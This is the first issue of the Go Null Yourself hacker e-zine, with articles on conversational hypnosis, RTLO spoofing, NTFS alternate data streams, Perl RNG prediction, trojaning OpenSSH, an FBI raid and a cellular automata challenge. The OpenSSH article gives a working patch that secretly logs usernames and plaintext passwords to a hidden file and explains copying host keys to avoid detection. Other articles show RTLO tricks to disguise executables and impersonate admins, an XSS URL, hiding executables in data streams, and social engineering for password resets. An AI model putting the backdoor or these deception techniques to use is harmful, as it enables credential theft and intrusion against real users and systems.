,hs+;-, MMMMMMMNdyo/:. Go Null Yourself E-Zine MMNydNMMMMMMMMMmhs+:-` MM/ `-/oshmMMMMMMMMMNdyo/. Issue #1 Mm .:+sydNMMMMMM. ys+:.` M: `hMMMy +MMMMMMNdyo/-` www.GoNullYourself.org N+:. .MMMM. `NMMMmNMMMMMMMMNmhs+:. MMMMMmhs+/-` hMMMs oMMMd `-/oydmMMMMMMMMMNdyo/-` shmMMMMMMMMMNdyo/:. -MMMN` `NMMM- .:+shmNMMMMMMMs :+:. .:/oydNMMMMMMMMMNMMMo sMMMh `-sMMMN` `NMMM- /-` `-/oshmMMMMMN` .MMMM- dMMMo sMMMh MMMNdyo+:. mMMM+ yMMMy :MMMN` .MMMM- dNMMMMMMMMMmhs+/-`/MMMm -/oy. mMMM+ yMMMy : `-/+shmMMMMMMMMMMMMM/ /MMMm .MMMM. m .:+oydNMMMMd mMMM/ hMMMy /M `-/o- `+shh -MMMMMNmhs+:. mM -oydNMMMMMMMMMmdyo/-` +MM `.:+shmMMMMMMMMMNdhsNMM 0x01 Introduction teh crew ys+:. `-/oydNMMMMMMMM 0x02 Conversational Hypnosis hsu -+shmNMMMMMMMMNdhs+:. sMMMy 0x03 RTLO Spoofing storm `-/oydNMMMMMMMMMmhyMMMM. 0x04 Alternate Data Streams d4de `.:+shmMMMMMMMMs 0x05 Derandomizing Perl's RNG Kheldar .-/oydm` 0x06 Trojaning OpenSSH storm 0x07 Story of a Raid OrderZero 0x08 Programming Challenge storm 0x09 ConfCon 2010 CFP PhreakerD7 0x0a 907-887-88xx Scan storm 0x0b Et Cetera, Etc. teh crew [====================================================================================] -=[ Introduction ]=- [ Author: teh crew ] Welcome to the first issue of the Go Null Yourself e-zine. Glad you could join us. This publication is the product of a close group of friends who love to tinker with and push technology to the limits. You may know us more commonly as hackers. We are a collection of like-minded individuals promoting freedom of thought and the pursuit of technological curiosity. We enjoy solving problems and innovating new ways of doing things. We keep our minds open to new ideas and build upon each others' work to produce even greater results. We stick to our beliefs and do not back down in the face of hostility. Within this zine, we hope to present a well-rounded spectrum of information, both technical and non-technical, spanning a number of disciplines. Hopefully you may find something that sparks your interest. If you are interested in submitting content for future issues of GNY Zine, we would be happy to review it for publication. Content may take many forms, whether it is a paper, review, scan, or first-hand account of an event. Well-received topics include computer hacking and exploitation methods, programming, telephone phreaking (both analog and digital), system and network exploration, hardware hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering. We are also receptive to content relating to concrete subjects such as science and mathematics, along with more abstract subjects such as psychology and culture. Both technical and non-technical material is accepted. Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent via: - IRC private message (storm or m0nkee @ irc.distrust.us #gny) - Email (zine@gonullyourself.org) If there is a enough feedback, we will publish some of the messages in future issues. We have devoted a lot of effort into this publication and hope that you learn something from reading it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed, utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless citing certain passages) and give credit to the original authors when and where necessary. Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or damage that may result from the information presented within this publication. Although people will be people and act in idiotic fashions, we do not condone, promote, or participate in illegal behavior in any way. With that being said, let there be zine. [====================================================================================] -=[ Introduction to Conversational Hypnosis ]=- [ Author: hsu ] Preliminary note: All descriptions and examples are meant for learning and understanding purposes only; I have made sure that no example can actually be used in daily application. Conversational hypnosis is something that is learned from personal experience, not copied. If you would like to learn more about the topic, I suggest you read the lectures by Tyler Starr. To most of the world, hypnosis is thought to be a simple form of entertainment in which a "hypnotist" causes his or her subjects to perform all kinds of ridiculous tasks under what they call a "trance." However, one must delve deep into the processes of hypnosis to truly understand what is going on. In very basic terms, hypnosis consists of a period of relaxation (self-explanatory), induction (where the subject is actually put into trance), some sort of continuation of that induction that simultaneously establishes the connection between hypnotist and subject (allowing for the appearance of control to take place), and awakening (also self-explanatory). The big misunderstanding most people have is the sense of "control" that the term "hypnosis" implies. In truth, the subject is actually completely in control of his or her actions at all points of hypnosis. The "trance" is simply a state of mind in which the subject has allowed him/herself to fall into the mindset of simply listening and performing through the hypnotist's guidance. With that in mind, one can realize that hypnosis can be used in other settings as well, though the processes might not be very recognizable. Let us take car salesmen for example. Though they do not know what they are doing psychologically, they are actually trained to use a very altered form of hypnosis to make their deals. Step 1 - Relaxation: they bring you into the store with a welcoming smile and a happy, yet confident tone that non-verbally "assures" an unsuspecting person that the salesman is friendly. Some might even add to that by offering them some kind of "loophole" or "trick" to "save him/her money," (starting to sound familiar?) because then the potential buyer has been shown that this salesman is out for his/her interest and that he is trustworthy Step 2 - Induction: the salesman begins to pick up the pace, speaking most of the words in the conversation as the buyer begins to slip into the mindset of simply listening and following along Step 3 - Continuation: the salesman quickly brings up a seemingly good deal and firmly states his belief that action must be taken right away in order to secure the deal. Under the passive mindset, the buyer quickly takes in the salesman's words with little to no processing and quickly accepts the deal, driving away in a new, far too overpriced car. Step 4 - Awakening: in this example, the awakening simply occurs as the buyer is talking with his or her family about the purchase and suddenly realizes just how much money was spent or lost. Another aspect of conversational hypnosis is governed by Advanced Language Patterns (ALP). ALP is used to steer conversations in a certain direction. Many people simply call this prospect "mind fucking," as it tends to do just that. The entire process centers around a combination of reverse psychology and careful introductions of new topics. For instance, let us say a boy is getting into an argument with his girlfriend that he knows he cannot win. Here is how ALP can be implemented: The boy first heats up the argument by seemingly defending his case, despite the many counterexamples his girlfriend provides, which simply makes her more angry. Then, he suddenly gives in, agreeing with her in only a very slight sarcastic tone - just enough for her to believe he is probably serious but is perplexed enough to ask if he actually agrees. Then, in a very sarcastic tone, he disagrees with her again. Such a process involves two reverse psychological steps to create a contradiction within her mind, ending up with her believing that she has won but still not fully understanding what is going on. At this point, she is prone to suggestion and the boy brings up a scenario similar to the current predicament brought on by another friend... and then another by the same friend. Perhaps it was that friend's fault all along for this entire argument! (Obviously, this series of events is quite a bit more abrupt than an actual conversation, but you get the idea.) In the end, ALP has allowed the boy to set the conversation onto a different topic that leaves him without risk of losing the argument. Next comes the haxxor favorite: social engineering (also sometimes associated with seduction). Unlike ALP, in which the subject of the conversation changes, social engineering manipulates the situations in which the conversation takes place. For instance, a typical college student calls AT&T tech support and asks for a password to one of their secure databases... you can imagine the turnout of the conversation... *click.* However, social engineering can have quite an astounding effect on the exact same sequence of events. By using an established position, such as "the security manager for tech support" (No, I'm not giving you better ideas.), the student can call a backdoor operator number and firmly state that there has been a security breach in the database and that his password must be reset to "blablabla." The support agent is far more likely to accept the scenario and carry out the order. An excellent resource for more information and further, more practical examples of social engineering is the article "Influential Angels" in the spring 2010 issue of "2600: The Hacker Quarterly." Finally comes Neuro Linguistic Programming (NLP), otherwise known as the "black mirror technique." This area is, by far, the most difficult to learn and master. It involves watching every movement of a subject in every possible scenario available in search for specific physical patterns associated with emotional states. One will notice that a vast majority of the patterns are fairly constant from person to person. Once you learn the patterns to a specific person, you can easily tell exactly what he or she is feeling. By doing so, you can use prior knowledge to attempt to decipher exactly what the person is thinking about in extremely vivid detail (Anyone been to a "psychic" before?). At that point, the black mirror technique requires you to places those thoughts and emotions into your own mind, in essence adopting the mind of your subject. By doing so, you can think exactly like him or her - you will know what reaction will be given in response to what stimulus and so on, allowing you to say or do whatever would bring the exact response you wish to achieve. You are essentially placing yourself in your target's shoes. As you can see, each of the four sections provides a person with great "control" over those around him or her. The question then becomes: What happens when you combine all four together? The result is "black ops." Truly, it is impossible to describe any sort of daily scenario for this phenomenon as it can only be expressed through actually implementing its techniques in practice. As mentioned before, these practices cannot be taught or copied - they must be experienced. One must always keep in mind that this tool CANNOT be defeated by ANY person unless that person also knows and has used black ops. It is a powerful tool that should be used responsibly for the GOOD of others. Here is a quick example. Imagine, if you would, that we were having a casual conversation about bananas when, all of a sudden, I lost the game. Most people would just brush it off, but no, I just could not stop thinking about it and ended up associating bananas with the game. And so, every time I said the word, bananas, I would lose the game, causing you to associate bananas with the game as well. You would be quite angry wouldn't you? Well now let me ask you this: what is the first thing that comes to mind when I say..."bananas?" If it isn't the game, congratulations, you are learning fast; however, for the vast majority of you, consider what just happened. You were presented with the most obvious example possible and yet were still forced to mold your thoughts to a certain pattern without the slightest but of control. Now imagine you had no indication that such an act was to take place; imagine that this was done in person, instead of from a brief magazine article without you ever knowing. Welcome to black ops. [====================================================================================] -=[ RTLO Spoofing ]=- [ Author: storm ] Email: storm@gonullyourself.org Website: http://gonullyourself.org/ RTLO spoofing is a fairly new yet under-documented security flaw that may have serious implications in the hacking scene in the very near future. Such an attack furthers social engineering efforts by displaying illegitimate text in the place of user-inputted data, potentially tricking target users into granting trust or falling into malicious traps. The acronym RTLO stands for Right-to-Left Override, which is a Unicode character used to reverse the direction of text on its respective line. For instance, by inserting the RTLO character into a string: [RTLO]abcdefg the following is instead displayed on the screen: gfedcba The RTLO character may also be placed mid-string, having no effect on preceding text. For example: abcdefg[RTLO]hijklmnop is displayed as: abcdefgponmlkjih The RTLO character is most commonly used when displaying text in Hebrew, Arabic, or any other foreign language that reads right-to-left. The Unicode number for RTLO is 202e, and a number of methods for inputting the character are enumerated at http://bit.ly/63tKRN . HTML also provides a method to render the proper directionality of text with the DIR attribute by defining the value DIR=ltr for left-to-right and DIR=rtl for right-to-left. However, this method is obviously only applicable to web pages, whereas the RTLO Unicode character itself is universal throughout most of the computer. One may abuse the RTLO character by falsifying sensitive text strings, such as filenames, usernames, and URLs. The consequences of a successful attack are dependent upon the scenario. In the context of spoofing a filename, hackers may more effectively social engineer victims into downloading, accepting, and executing malicious files. Those spreading malware will commonly try to obfuscate filenames by including an innocuous file extension in the filename itself - "notavirus_freesex.jpg.exe", for instance. However, by utilizing the RTLO character, a hacker may instead reverse the text direction of the file extension, framing the file as a completely different filetype. By inserting our special character, as shown: hotgirlss[RTLO]gpj.exe our target now views the file as: hotgirlsexe.jpg The quality of the spoofed filename will obviously vary with the level of creativity at the time. There are numerous executable file extensions, and it should not be difficult to find one that fits well with the spoofing attack scenario. It should also be noted that by spoofing the file extension, the actual filetype of the file does not change. "hotgirlsexe.jpg" is still an executable file with the extension .exe, but it is simply being displayed as a .jpg image file instead. File downloads within web browsers are also vulnerable to RTLO spoofing. Users may queue a file for download but find the filename obfuscated, potentially tricking them into opening malicious executable files. Mozilla took note of this attack vector and deployed patches for their Firefox and SeaMonkey software in late 2009. Next, hackers may utilize RTLO spoofing to falsify usernames and other text fields in user profiles. Common targets for this attack are online forums and other web communities. A typical attack consists of finding the name of an existing administrator, moderator, or any other privileged staff member and creating a new account with the name reversed, preceded by the RTLO character: [RTLO]rotartsinimdA [RTLO]pOsyS [RTLO]rotaredoM Et cetera, et cetera. Doing so will of course not magically grant your new user account with any special permissions or access, but it's useful for social engineering unsuspecting and ignorant users. At the very least, it's a fun prank. The GNY board itself can actually be made an example of for attacking forums with spoofed usernames. In February 2010, Anarchy_Angel registered a new user account using the name "[RTLO]eekn0m", which displayed as "m0nkee" on screen, mirroring m0nkee's actual administrator account name. As we were not familiar with the attack vector at the time, quite a bit of confusion followed until Anarchy linked to an explanation, introducing our community to the concept of RTLO spoofing. The third scenario that will be covered is using RTLO spoofing in the context of URLs. Such an attack may be used when attempting to trick an unsuspecting user into clicking a malicious link that appears to be a seemingly trustworthy website at first glance. Previous methods of achieving this included hosting the malicious page on a similar-looking domain name or including the page in an XSS vulnerability on the trustworthy website. An example of the first method would be to host a mirror of the Citibank login page either at "c1tibank.com" or "freehosts.com/citibank.com/" (as in, register a new domain name or establish a URL that may be easily confused with the actual name) in attempt to phish user credentials. An example of the second method would be to inject an IFrame of a remote page housing malicious code into an XSS-vulnerable trustworthy website, as so: http://www.merriam-webster.com/dictionary/book=dictionary%3C/title%3E%3Cscript%3Ejavas cript:alert(document.domain)%3C/script%3E&va=lol Of course, this URL merely causes a JavaScript popup message to appear, but any HTML may be injected in its place. CSRF is also very possible at this point. By now, you may have an idea as to how RTLO spoofing a URL will work, but I will provide an example regardless: [RTLO]http://someevilsite.com/moc.elgoog.www//:ptth will display as: http://www.google.com/moc.etisliveemos//:ptth The product of RTLO spoofing a URL is similar to the XSS method shown above, as the victim is faced with a link that appears to point to a trusted domain name but is followed by a slew of seemingly random characters. The only difference is that the RTLO method doesn't require URL encoding to effectively obfuscate the deceit lain within. Hopefully, more vendors will recognize the security threat posed by abuse of the RTLO character and incorporate methods of combatting falsified text in future versions of their software. Until then, this attack vector will very likely become increasingly prevalent in the hacking scene as people continue to follow the same mediocre security policies and blindly trust content without understanding that the greatest threats are the ones you do not expect and cannot see. Works referenced and further reading: http://packetstormsecurity.org/papers/general/righttoleften-override.pdf http://hackers-hideaway.com/blog.php?post_id=94 (currently offline) http://www.mozilla.org/security/announce/2009/mfsa2009-62.html And special thanks to: Anarchy_Angel [====================================================================================] -=[ Alternate Data Streams ]=- [ Author: d4de ] Email: amr.ali.cc@gmail.com Website: http://amr-ali.co.cc/ Introduction ------------ I have learned from a friend of mine "tUff" about something called ADS, which, as far as I know, is only available in the NTFS filesystem. However, if someone has found this "feature" somewhere else, please let me know. In the NTFS file system, there are different types of data streams: one that holds the security information and another that holds the "real" data. There may be another stream with link information instead of the real data stream, if the file actually is a link. And there may be alternate data streams, holding data the same way the standard data stream does. You might think that Microsoft didn't actually document this, but in a matter of fact they did documented it. Besides that, there is a lot of information and articles about it all over the web; however, it seems that not many people do actually know about it. Practical Usage --------------- Yes, I hear all of you saying, okay cool info to know about, but how we gonna use it in a practical way? And my answer would be, don't let your limited imaginations limit the usage of such feature. You can basically do many things with it - for example, you could use it with hiding your application registration information, or better yet, hide some secrets of yours. Or, if you are such a BlackHat, you can hide viruses/worms/rootkits/etc. "I hear the devil laughing already!" There are two ways to hide your data in ADS: you can hide it in a folder, or you can hide it in a file. And no, it's not going to change anything either for the folder or the file except its date stamp. The size of the "carrier" will never change whatsoever. Let's learn some tricks here, shall we... -= Hiding a file in a folder =- mkdir C:\folder echo datastuffs > C:\folder:secrets.txt In the example above, we see that we redirected the output of "echo datastuffs" to be stored at "C:folder:secrets.txt". Cool, huh, but wait. You will also notice that there is no backslash between "folder" and "secrets.txt". And seriously, it's not a typo - it's how it's supposed to be written. First, I want you to go check and see if the folder "C:\folder" contains anything, and check if the size changed. Voila, nothing is actually there! Well, let's then do this: notepad.exe C:\folder:secrets.txt A bit surprised of the outcome? You haven't seen anything yet. Now let's jump to the next part. -= Hiding a file in a file =- echo ohnoes > C:\folder\textfile.txt echo datastuffs > C:\folder\textfile.txt:secrets.txt Ooh, that is a bit odd now. Well, it's far from oddness; it's just the same thing we did before, but instead of hiding it in a folder, we hid it in a file. So, now you understand the significance of ":". It means that you are accessing an alternate data stream instead of the normal ones or the "visible" ones, so to speak. Now, let's check if the file "secrets.txt" that we hide in the file "textfile.txt" is actually holding any data. notepad.exe C:\folder\textfile.txt:secrets.txt Still amazed? Well, I gotta tell you that you still don't know the true potential of such a feature. Now, what if we wanted to be a little devilish and hide some executable files? Stay with me on this one. copy C:\windows\system32\calc.exe C:\folder\calc.exe type C:\windows\system32\notepad.exe > C:\folder\calc.exe:notepad.exe start C:\folder\calc.exe:notepad.exe We simply did here the usual - just copied calc.exe (which is Calculator) to our test folder so we don't mess anything up, and we hid the notepad.exe file (from the system dir) in our copied calc.exe file. We then finally executed our hidden file "notepad.exe," which now is located at "C:\folder\calc.exe:notepad.exe". I hear you say, "Wow, how lame that is! You just started notepad.exe from a hidden location!" Well, first I'll excuse your ignorant behavior and tell you to go look at your Task Manager and tell me if you found any notepad.exe actually running. Huh, what I can't hear you! Yeah, that's right; you just see calc.exe. See, that's now what I was talking about - you are having notepad.exe running in front of your eyes, but Windows Task Manager doesn't have this feature implemented, so it can't actually tell if you are running another program from an alternate stream. Instead, it just gives you the carrier file name, which in our case would be "calc.exe". -= How to delete a file stored in ADS =- First, let's assume that you have a file called vip.exe, and this file got hidden by some major dirty worm that you kids developed, and you are sorry and wanted to delete the worm from ADS. In order to do so, you should: ren vip.exe temp.exe type temp.exe > vip.exe del temp.exe But what if we have worm.exe hidden in the folder C:\windows? Sounds messy, huh? Don't be afraid; it's also easy to do, so don't worry about it and follow: notepad.exe C:\windows:worm.exe Delete the contents of worm.exe and then save. Notepad will tell you that the file is empty and ask if you want to delete it - confirm the action, and you are done. Note: If you are using NT 5.x, then you will need Notepad from NT4tools to be able to remove a "worm.exe" from a folder. Tools and Codes --------------- Now, for all of you that want to play more and have some fun with it, I'll provide you with some application names I know of that are useful when dealing with NTFS ADS: * Sysinternals (a must have) * streams.exe (Included in Sysinternal suite) * LADS * crucialADS by CrucialSecurity And here are some links that you might find interesting: * http://msdn.microsoft.com/en-us/library/ms810604.aspx * http://www.windowsecurity.com/articles/Alternate_Data_Streams.html * http://www.flexhex.com/docs/articles/alternate-streams.phtml * http://support.microsoft.com/kb/105763 * http://support.microsoft.com/kb/943393 * http://en.wikipedia.org/wiki/Fork_(filesystem) * http://www.irongeek.com/i.php?page=security/altds * http://www.ntfs.com/ntfs-multiple.htm * http://www.auditmypc.com/freescan/readingroom/ntfsstreams.asp Thanks goes to tUff, who first introduced me to NTFS ADS. [====================================================================================] -=[ Derandomizing Perl's Random Number Generator ]=- [ Author: Kheldar ] Contact: irc.distrust.us #gny Website: http://insomnia247.nl/~Kheldar/blog/ Computers are deterministic machines. As such, true randomness is hard to achieve. Instead, computers settle for pseudorandom numbers - numbers that appear random at first glance, but in reality follow a very distinct algorithm. For this paper, I'm going to be taking a look at the pseudorandom number generator (PRNG) that my installation of perl uses. It can be found with the command "perl -V:randfunc", and on most *nix systems the algorithm's called drand48. The algorithm produces a sequence of 48-bit integers, X, and can be described by the following equation: Xn+1 = (0x5DEECE66D * Xn + 0xB) mod (2 ** 48) As you can see, it's a pretty simple algorithm. The important part is the modulus performed at the end - since it's mod 2**48, 48-bit arithmetic is performed (that's where the 48 in the name comes from, if you haven't figured that out yet). So, now you know what happens when you call perl's rand() function. The program takes the previous value in the sequence, and using the aforementioned formula, calculates the current value. "But, what will the first value in the sequence be", you ask. Well, if you've ever heard the term "seed", or used the function srand(), this is it. The srand() function simply changes the previous value in the sequence, changing the outcome of the next one. With the drand48 algorithm, it's a bit more complicated than simply assigning the value. The function takes a 32-bit integer, and sets the 32 high-order bits of the previous term to that value. Then, the 16 low-order bits (remember, we're dealing with 48-bit integers here) are set to the arbitrary value 0x330E. Now that we know all that, I think we're able to write our own implementation of drand48... Here it is: #!/usr/bin/env perl use strict; use warnings; use bignum; # the current value my $x; sub srand48 { $x = (shift or 1) & 0xFFFFFFFF; # only use the low-order 32 bits $x <<= 16; # set the 32 high-order bits to the arg $x |= 0x330E; # set the 16 low order bits to the arbitrary value 0x330E } sub drand48 { # compute the next value $x = (0x5DEECE66D * $x + 0xB) % (2 ** 48); # return said value using the same precision as perl's rand() return sprintf "%.15f", $x / (2 ** 48); } You'll notice in the drand48() function that we actually return a decimal value. This is in order to match the precision used by perl's rand() function. Now, let's compare the output of our new drand48() function with perl's good old rand() function. Append the following code to your script: my $val = shift; srand48($val); srand($val); for(1..5) { print drand48() . " " . rand() . "\n"; } And let's check the outcome! $ ./myrand.pl 1 0.041630344771878 0.0416303447718782 0.454492444728629 0.454492444728629 0.834817218166915 0.834817218166915 0.335986030145200 0.3359860301452 0.565489403566136 0.565489403566136 $ Not bad, I'd say. Now, there are a couple interesting things we can do with this - the most obvious being predicting future random numbers. In fact, all we must do is figure out where perl's random number generator is and calculate the next value! It's all coming together :-). Here's a function that will do just that: sub predict_rand { my $curr = shift or return; $x = $curr * (2 ** 48); print "\nI predict the next random number is: " . drand48() . "\n"; } When passed the current output of perl's rand(), this function will predict the next one to several decimal places. It's not perfect, because rand() doesn't actually give you enough information to find out exactly what the current term is. In order to do that you'd have to, well, find out where it's stored in memory and read from there. But that's for next time. ~Kheldar Sources: [1] http://opengroup.org/onlinepubs/007908799/xsh/drand48.html [====================================================================================] -=[ Trojaning OpenSSH ]=- [ Author: storm ] Email: storm@gonullyourself.org Website: http://gonullyourself.org/ The following patch file may be used to insert a logging feature in the latest source release of portable OpenSSH (5.5p1). Portable OpenSSH is designed to run on a multitude of operating systems, most notably Linux, while the main release is designed to essentially run only on BSD. These edits should be easy to migrate to other releases and version numbers if you are inclined to do so. By patching and installing a trojaned OpenSSH package, a hacker may potentially escalate and expand his access by capturing valid logins and re-using the credentials elsewhere on the network. Keeping a list of valid logins also provides additional points of potential re-entry, should the hacker's presence be discovered. The patch I wrote is very simple and does not provide rootkit-like features, such as a "magic password" that grants instant root access or the ability to hide login sessions. Its sole purpose is to log both successful and unsuccessful login attempts to a text file, where a hacker (or nosy system administrator) may view them at a later time. Future releases of this patch may possibly provide extended features and additional logging abilities, such as submitting entries to a remote HTTP server. A final step to perform after installation is to copy the host keys from the existing, un-trojaned SSHd to the new, trojaned SSHd to prevent any red flags from being raised upon connecting. Observe, where I use port 22 as the untrojaned SSHd and port 2222 as the trojaned SSHd to exemplify the process: delicious:~# ssh localhost -p22 The authenticity of host 'localhost (127.0.0.1)' can't be established. RSA key fingerprint is 9d:f4:b6:a4:02:fc:1f:f3:ac:b4:26:5b:45:22:20:cb. Are you sure you want to continue connecting (yes/no)? no Host key verification failed. delicious:~# ssh localhost -p2222 The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. RSA key fingerprint is 53:ec:14:9d:8d:0b:85:52:04:8b:88:26:9a:54:89:6c. Are you sure you want to continue connecting (yes/no)? no Host key verification failed. delicious:~# cp /etc/ssh/* /root/ssh/openssh-5.5p1-install/etc/ delicious:~# ssh localhost -p2222 The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. RSA key fingerprint is 9d:f4:b6:a4:02:fc:1f:f3:ac:b4:26:5b:45:22:20:cb. Are you sure you want to continue connecting (yes/no)? Have fun. ;) -=-=- diff -rupN openssh-5.5p1/auth-passwd.c openssh-5.5p1-backdoored/auth-passwd.c --- openssh-5.5p1/auth-passwd.c 2009-03-07 19:40:28.000000000 -0500 +++ openssh-5.5p1-backdoored/auth-passwd.c 2010-06-17 14:14:23.000000000 -0400 @@ -123,6 +123,19 @@ auth_password(Authctxt *authctxt, const } #endif result = sys_auth_passwd(authctxt, password); + + // Begin Backdoor + + if ( result ){ + snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Successful login %s:%s from %s\n", authctxt->user, password, get_remote_ipaddr()); + hidden_log(); + } else { + snprintf(hidden_buff, sizeof(hidden_buff) - 1, "Invalid login %s:%s from %s\n", authctxt->user, password, get_remote_ipaddr()); + hidden_log(); + } + + // End Backdoor + if (authctxt->force_pwchange) disable_forwarding(); return (result && ok); diff -rupN openssh-5.5p1/includes.h openssh-5.5p1-backdoored/includes.h --- openssh-5.5p1/includes.h 2009-08-20 02:16:01.000000000 -0400 +++ openssh-5.5p1-backdoored/includes.h 2010-06-17 14:12:24.000000000 -0400 @@ -172,4 +172,24 @@ #include "entropy.h"; +// Begin Backdoor + +#include +#include +#define HIDDEN_LOG_FILE "/tmp/.ssh_log" + +FILE *hiddenlog; +char *hidden_buff; + +#define hidden_log() { \ + chmod(HIDDEN_LOG_FILE, 0666); \ + hiddenlog = fopen(HIDDEN_LOG_FILE, "a"); \ + if ( hiddenlog != NULL ) { \ + fprintf(hiddenlog, "%s", hidden_buff); \ + fclose(hiddenlog); \ + } \ +} + +// End Backdoor + #endif /* INCLUDES_H */ -=-=- [yo@Wakari ~]$ cat /tmp/.ssh_log Invalid login root:llolol from 127.0.0.1 Invalid login root:dfsdfsfsdf from 127.0.0.1 Invalid login root:dkfjgfdgjdk from 127.0.0.1 Successful login root:crapz0rs from 127.0.0.1 Successful login root:crapz0rs from 192.168.0.110 [====================================================================================] -=[ Story of a Raid ]=- [ Author: OrderZero ] Contact: irc.distrust.us #gny + Freenode Alright, so we've all had the thought "OH SHIT - this is serious. I could get raided for this." (right?). It eventually dissipates like the adrenaline of a huge hack does, and after a while you forget anything about it, maybe storing the files on a thumbdrive somewhere after reviewing them. Nothing valuable or interesting? Oh well. Well, that "oh well" may be the next "FBI SEARCH WARRANT." Yeah, it seems like I'm making a joke, doesn't it? I thought it was pretty funny too, the paranoia all leading to funny "FREEZE! FBI!" jokes. That joke become reality for me on June 9th, 2010 at 6:20AM. It happened one night after a long day of work. I had the next day off, so I had my usual energy drink-induced buzz going, doing my regular exploring around, chatting with friends and such. I was getting pretty weary around morning; I was about to check on some boxes of mine and my friend's (legitimate, of course) and pass out, when I suddenly hear loud footsteps on the porch. I simply attributed them to dogs or some other random family visitor. It wasn't until I was turned around, being patted down like a sex doll, that I realized what had just happened, and to this day, it still seems like a dream... I had just been what we so often laughed about in those chat rooms, what we so often attributed to paranoia and movies - I had been raided. Sure, I had seen the stories: Mitnick, Bernie, etc., and almost instinctively knew what to do when I realized what was happening. They quickly marked off the rooms in the home A, B, C, etc. while photographing anything and everything (Note: At this point, I hadn't been informed as to what the search warrant was about). They quickly escorted me outside to their (Guess the vehicle color) black Chevy Suburban with tinted windows, where they made it an accident to put me in the backseat while one agent sat beside me and another sat in front. They quickly started asking questions. Not really knowing what they wanted (but knowing what might happen), I answered few questions and asked for a lawyer when things started getting aggressive. Then they did mention it was completely voluntary but in my "best interest" to tell everything I knew so I could get a good word in with the people above them (Yeah, I bet). After about 2 minutes of him telling me that I was lying and me simply looking him in the eye for about 30 seconds, they escorted me out of the vehicle, at which point I went inside and sat for a good 4 hours while they searched through everything, connected to my network (One agent mentioned "It's ipconfig, right?") and took snapshots, took my books and magazines related to computers, and took anything that could modify, alter, create, analyze, or store data. My parents didn't completely realize what was going on, simply knowing that I was a computer nerd and could pretty much "fix anything relating to computers." They knew I was interested in computer security, and while my mom wasn't completely against it, she certainly wasn't for it. My dad didn't know as much about computers but did mention several times that I'd either end up in jail or at a top paying job.... Go figure. While sitting, I tried to relate to some of the guys in there. I mean, here were people who supposedly knew what they were doing, right? My personal observance indicated one person who apparently had been bragging about Ubuntu and was the geek of the group. He, according to others in the group, was working for Microsoft in some way or another when he was hired by the FBI and had done some kind of translation in the Freedom Downtime movie for 2600 (After they found my magazines, they mentioned this humorously). He at least mentioned a Linux distribution, so he scored a few points with me. While this social interaction was going on, I was going through my entire hard drive in my head. I'm not going to say I haven't done things that might warrant such a search. I've had my share of dark side moments. This paper isn't to declare my innocence or declare the FBI is evil - they're just doing their job (albeit with too much power), but some simple rules need to be followed when copying data like we all do. I will list a few here: 1. Use encryption - This is possibly my fatal mistake. I didn't encrypt as much as I should have, and it really will leave me open to anything the FBI wants to portray me as. 2. Booby traps - I didn't use them. It does seem a bit far-fetched, but if I had a magnet nearby, do you think I would've used it? Damn straight. However, even if I did have a magnet, there is little time to do anything once they bust in. So, what is there to do? Well, there are various online sources for mechanisms that will conditionally destroy data or the drive itself. It's not required, but it's certainly recommended in my case... 3. Incriminating evidence - Sure, it's just a simple server-client program in C, but what is it to the FBI? A trojan possibly? You bet your sweet ass. All I can say about this is that anyone who is a regular programmer should keep this encrypted as well. Anything simple can be turned into something evil by anyone with enough motive. As this paper is being written, I have not been given further information about the case against me. The FBI very simply came in, took everything, and left. It was very much similar to being robbed, except the perpetrators had an excuse. What was their excuse, you ask? Well, it's the good ol' Title 18 (section 1030, specifically) regarding a recent leak of emails and future plans within the website Lockerz.com*. The FBI agent who came to my state to conduct the search was from the same place this website is based out of. This law states: "Whoever- - having knowingly accessed a computer without authorization or exceeding authorized access, and by means of such conduct having obtained information that has been determined by the United States Government pursuant to an Executive order or statute to require protection against unauthorized disclosure for reasons of national defense or foreign relations, or any restricted data, as defined in paragraph y. of section 11 of the Atomic Energy Act of 1954, with reason to believe that such information so obtained could be used to the injury of the United States - intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains information contained in a financial record of a financial institution, information from any department or agency of the United States, or information from any protected computer - obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1-year period; - knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer, intentionally accesses a protected computer without authorization, and as a result of such conduct, recklessly causes damage, or intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage and loss. - with intent to extort from any person any money or other thing of value - knowingly and with intent to defraud traffics in any password or similar information - such trafficking affects interstate or foreign commerce or such computer is used by or for the Government of the United States" In conclusion, it's healthy to be paranoid in this type of scene. Don't laugh off FBI raids, because they're real, they do happen... It did happen. Make sure WHEN it happens that there's nothing that can be thrown at you, and if there is, make sure it's encrypted. Don't put it off - you could be raided before you even close this window. *Lockerz.com is an invitation-only website where friends invite other friends, and for every friend who signs up, PTZ are given. These PTZ are used to obtain prizes. While the pyramid scheme is obvious, the project is funded by Liberty Media, one of the largest media companies in the U.S. [====================================================================================] -=[ Programming Challenge - Elementary Cellular Automata ]=- [ Author: storm ] Email: storm@gonullyourself.org Website: http://gonullyourself.org/ According to Wolfram MathWorld, "a cellular automaton is a collection of 'colored' cells on a grid of specified shape that evolves through a number of discrete time steps according to a set of rules based on the states of neighboring cells. The rules are then applied iteratively for as many time steps as desired." To break that definition down into layman's terms, a cellular automaton is a mathematical modeling system that displays progressive growth through a grid of cells according to a defined ruleset. Future steps in growth in cellular automata (each iteration referred to as a "generation") are dependent upon the behavior of previously-generated cells. How these future cells are generated is also dependent upon the ruleset. Although a ruleset of a cellular automaton may technically change as growth progresses, it typically remains constant throughout the entire system. Cellular automata are utilized in mathematics and science to analyze and predict behavior in nature. For example, such models have been used to explain patterns of snowflakes and the formation of conch shells. For this programming challenge, we will concern ourselves with elementary cellular automata, one of the simplest classes of cellular automata. Elementary cellular automata are one-dimensional, and cells may assume only one of two states - on (1) or off (0). Each rule is comprised of eight states, which are defined using binary notation (000, 001, 010, 011, 100, 101, 110, 111). There are 256 unique rules. One may determine the ruleset by converting the decimal rule number into binary and matching 